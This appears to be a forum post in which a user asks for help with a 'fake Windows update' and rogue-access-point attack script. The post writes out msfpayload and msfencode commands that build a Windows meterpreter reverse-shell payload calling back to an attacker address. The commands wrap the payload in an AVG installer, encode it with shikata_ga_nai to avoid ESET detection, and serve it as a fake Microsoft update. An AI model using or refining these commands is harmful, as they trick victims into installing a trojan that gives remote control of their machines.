Hi fellaz,

I'm trying to modify the fake Metasploit update and fake AP pwn script to add a different encoding option in the payload with shikata_ga_nai:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.75 LPORT=9090 R | msfencode -x avg_free_stb_all_9_114_cnet.exe -t exe -e x86/shikata_ga_nai -c 10 -o avg.exe

Trying to just add the encoding part, so will use (i.e.):

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.75 R | msfencode -x avg_free_stb_all_9_114_cnet.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/Windows-KB183905-x86-ENU.exe

My ESET security picks up the Windows update, which is encoded differently to mine, but does NOT flag my payload. Where would I put my encode in the script, and does the update come via Microsoft first, downloaded to www, then encoded from the www folder on the fly?

This payload does not get flagged in ESET and could be the ultimate setup for both fake update and AP pwn.

Please help. I was up till 4 am trying different options, i.e. creating the payload first and then directing the script to http:\\192.168.1.75:80 Windows-KB183905-x86-ENU.exe. Something's missing, because it did work; I can't remember if it needed /var/www/ as well in the URL.


regards dee